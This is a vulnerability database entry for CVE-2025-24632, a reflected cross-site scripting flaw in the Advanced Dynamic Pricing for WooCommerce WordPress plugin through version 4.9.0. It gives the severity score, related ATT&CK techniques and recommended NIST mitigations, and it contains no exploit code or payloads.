CVE-2025-24632
Published: 31 January 2025
Summary
CVE-2025-24632 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Content Injection (T1659); ranked at the 35.4th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-24632 is an Improper Neutralization of Input During Web Page Generation vulnerability, enabling Reflected Cross-site Scripting (XSS) as classified under CWE-79. It affects the Advanced Dynamic Pricing for WooCommerce WordPress plugin by algol.plus, with the issue present in all versions up to and including 4.9.0. The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L), indicating high severity due to its network accessibility and scope change.
Attackers can exploit this vulnerability remotely over the network with low complexity and no authentication privileges required, though it demands user interaction such as visiting a maliciously crafted link or page. Exploitation allows injection of malicious scripts into reflected content on the site, potentially enabling theft of user session cookies, keystroke logging, or other client-side attacks within the victim's browser context, with low but cross-scope impacts to confidentiality, integrity, and availability.
The Patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/advanced-dynamic-pricing-for-woocommerce/vulnerability/wordpress-advanced-dynamic-pricing-for-woocommerce-plugin-4-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve) documents the Reflected XSS issue in Advanced Dynamic Pricing for WooCommerce version 4.9.0 and provides vulnerability details for WordPress site administrators.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-3833
Vulnerability details
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in algol.plus Advanced Dynamic Pricing for WooCommerce advanced-dynamic-pricing-for-woocommerce allows Reflected XSS.This issue affects Advanced Dynamic Pricing for WooCommerce: from n/a through <= 4.9.0.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Reflected XSS directly enables content injection (T1659) via malicious script execution in browser; facilitates session hijacking (T1185) by stealing web session cookies (T1539) and keylogging (T1056.001) as described in the CVE impacts.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
SI-15 directly prevents reflected XSS by requiring filtering of malicious scripts from user input reflected in web page generation.
SI-10 enforces validation of untrusted inputs to block malicious payloads that could lead to XSS injection in the WooCommerce plugin.
SI-2 requires timely flaw remediation, such as patching the Advanced Dynamic Pricing for WooCommerce plugin beyond version 4.9.0 to eliminate the XSS vulnerability.